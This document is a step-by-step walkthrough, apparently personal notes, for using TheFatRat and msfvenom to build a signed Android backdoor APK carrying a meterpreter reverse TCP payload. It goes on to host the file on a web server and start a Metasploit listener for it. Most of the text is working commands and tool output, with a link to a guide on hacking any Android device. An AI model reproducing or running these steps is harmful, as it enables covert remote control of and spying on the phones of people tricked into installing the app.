TheFatRat

Install

• git clone https://github.com/Screetsec/TheFatRat
• cd TheFatRat
• bash setup.sh

Start

• ./fatrat

Create Backdoor with msfvenom

• Create Backdoor with msfvenom
  • SIGNED ANDROID >> FatRat.apk
    • Set LHOST IP: 10.81.1.91
    • Set LPORT: 7774
    • Please enter the base name for output files : carlos
  • android/meterpreter/reverse_tcp

Resultat

  Generate Backdoor
  +------------++-------------------------++-----------------------+
  | Name       ||  Descript   	          || Your Input
  +------------++-------------------------++-----------------------+
  | LHOST      ||  The Listen Addres      || 10.81.1.91
  | LPORT      ||  The Listen Ports       || 7774
  | OUTPUTNAME ||  The Filename output    || carlos
  | PAYLOAD    ||  Payload To Be Used     || android/meterpreter/reverse_tcp
  +------------++-------------------------++-----------------------+




[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
 
[*] Creating RAT payload with msfvenom
[✔] Done!
[*] Creating a Valid Certificate
[✔] Done!
[*] Signing your payload APK
[✔] Done!

 Do you want to create a listener for this configuration
 to use in msfconsole in future ?

apk auf den Host bringen

• mv backdoored/carlos.apk /var/www/html/

Metasploit Console

• msfconsole
• msf > use multi/handler
• msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp

PAYLOAD => android/meterpreter/reverse_tcp

• msf exploit(handler) > set LHOST 10.81.1.91

LHOST => 10.81.1.91

• msf exploit(handler) > set LPORT 7774

LPORT => 7774

• msf exploit(handler) > exploit

[*] Exploit running as background job 0. 

[*] Started reverse TCP handler on 10.81.1.91:7774 

Links

• http://www.techroods.com/2017/04/hack-any-android-device-with-fatrat_1.html